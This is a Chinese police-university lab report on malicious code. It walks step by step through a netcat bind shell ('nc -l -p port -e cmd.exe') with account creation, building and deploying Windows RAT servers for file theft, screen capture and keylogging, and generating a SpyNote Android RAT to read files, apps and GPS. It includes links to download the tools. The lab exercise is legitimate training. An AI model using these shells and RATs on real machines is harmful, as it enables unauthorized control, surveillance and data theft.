1. 程式人生 > >實驗四 惡意程式碼技術

實驗四 惡意程式碼技術

實驗報告  

學    201521430004

 

中國人民公安大學

Chinese people’ public security university

 

網路對抗技術

實驗報告

 

實驗四

惡意程式碼技術

 

 

 

學生姓名

張凱強 

年級

2015 

區隊

三 

指導教師

高見 

 

 

資訊科技與網路安全學院

20181017

 

實驗任務總綱

2018—2019學年   學期

一、實驗目的

1.通過對木馬的練習,使讀者理解和掌握木馬傳播和執行的機制;通過手動刪除木馬,掌握檢查木馬和刪除木馬的技巧,學會防禦木馬的相關知識,加深對木馬的安全防範意識。

 

2.瞭解並熟悉常用的網路攻擊工具,木馬的基本功能;

3.達到鞏固課程知識和實際應用的目的。

二、實驗要求

1.認真閱讀每個實驗內容,需要截圖的題目,需清晰截圖並對截圖進行標註和說明。

2.文件要求結構清晰,圖文表達準確,標註規範。推理內容客觀、合理、邏輯性強。

3.軟體工具可使用NCMSF等。

4.實驗結束後,保留電子文件。

三、實驗步驟

1.準備

提前做好實驗準備,實驗前應把詳細瞭解實驗目的、實驗要求和實驗內容,熟悉並準備好實驗用的軟體工具,按照實驗內容和要求提前做好實驗內容的準備。

2.實驗環境

描述實驗所使用的硬體和軟體環境(包括各種軟體工具);

開機並啟動軟體office2003或2007、瀏覽器、加解密軟體。

3.實驗過程

1)啟動系統和啟動工具軟體環境。

2)用軟體工具實現實驗內容。

4.實驗報告

按照統一要求的實驗報告格式書寫實驗報告。把按照模板格式編寫的文件嵌入到實驗報告文件中,文件按照規定的書寫格式書寫,表格要有表說圖形要有圖說。

 

任務一 利用NC控制電腦

 

 NetCat,具有網路軍刀之稱,它小巧精悍且功能強大,說它小巧精悍,是因為他的軟體大小現在已經壓縮到只有十幾KB,而且在功能上絲毫不減。

 

實驗過程需要兩個同學相互配合完成:

 

步驟一:

 

   受害者的機器 (同學A)
輸入下面的命令:
  nc.exe -l -p port -e cmd.exe   進入監聽模式

 

 

 


步驟二:
  攻擊者的機器.192.168.31.237(同學B
輸入下面的命令:
  nc ip  port //連線victim_IP,然後得到一個shell (需要截圖)

 

 

 

 

 

步驟三:

 

    在shell中,利用net user 使用者名稱 密碼 /add ,新增一個使用者,並在受害者的機器中使用 net user 命令進行驗證。(需要截圖)

 

 

 在受害者主機中看到新加了zkq這個使用者:

 

 

 

 可以繼續通過命令列做一些事情。

 

任務二 利用木馬控制電腦

相關工具:

https://pan.baidu.com/s/1ipOkdU2HTPFtgU6fF669Gg

https://pan.baidu.com/s/1ajmRKsnv5XvFrKWzszDYwQ(備用,另外一個木馬)

 

實驗過程需要兩個同學配合:

 

步驟一:

 

    攻擊者的機器. (同學A
開啟V2014.exe程式或則star RAT,這兩個木馬功能類似。

 

 

 

 


步驟二:
  點選選單欄中的“服務生成,在彈出的配置服務端中,配置回IP地址(攻擊者IP)和埠號,並點選“生成”按鈕,生成木馬服務端。

 

 

 

 

 

步驟三:

 

將生成的木馬可執行程式拷貝到受害者的機器,並雙擊執行。

 

 

 

步驟四:

 

在控制端中檢視木馬上線情況,並對以下功能每個進行測試和截圖 

1、 檔案管理,嘗試拷貝檔案將目標主機G盤jietu.doc檔案拷貝到本機桌面。

 

2、 螢幕控制,嘗試獲取桌面

 

3、 鍵盤記錄,嘗試獲取對方擊鍵記錄:zhangkaiqiang

 

4、會話管理,重啟對方機器,檢視是否能自啟動上線

 

 

建立開始時勾選的綠色啟動,且在實驗室重啟之後對方原來電腦上的新建檔案都自動清除,重啟之後沒有上線

重新拷貝木馬檔案讓對方開啟重新上線。

4、 會話管理,解除安裝對方的木馬。

 

對方電腦木馬已被解除安裝。

 

任務三 Android遠控實踐  所有過程截圖寫部落格

 相關工具下載:

需要先安裝.net framework4.0 (自行搜尋下載)

spynote及環境工具:

https://pan.baidu.com/s/1Olo9znpzADXMYDfi_rnjOg

android模擬器:

https://www.yeshen.com/

http://mumu.163.com/

 

實驗步驟:

一、攻擊者開啟spynote軟體,該軟體需要先安裝.netframework4.0jdk環境。

 

 

 

 

 

二、配置並開啟監聽埠

 

    點選Listen Port,在彈出的對話方塊中輸入埠號,並點選Add按鈕,最後點選OK,成功監聽本地埠。【本過程選用3210埠,實驗過程大家可以自己選擇埠】

 

 

 

 

 

三、配置並生成木馬

 

1)點選Build Client按鈕,彈出對話方塊

 

 

 

 

(2)配置回連IP和埠,IP地址填寫執行spynote的機器IP,埠填寫監聽的埠號,本次填寫3210埠。

 

 

 

 

 

    (3)配置相關屬性資訊。

 

 

 

 

 

    (4)最後點選Build按鈕,在選擇框中選擇和spynote同處在一個資料夾中Patch-release.apk。

 

  

 

 

    (5)完成後,自動開啟APK生成所在的資料夾。

 

 

 

四、將木馬安裝在Android模擬其中。

 

 

 

 

五、在Spynote中控制手機

 

可以在spynote中看到有一臺機器上線,並可以檢視其基本資訊。

 

 

 

 

在該機器中右鍵,可以看到可以對該機器進行控制的功能,從中選擇4個以上的專案進行實驗。

(1)檢視資料夾

 

 

2)檢視設定

 

 

3)檢視應用軟體

 

 

4)檢視GPS資訊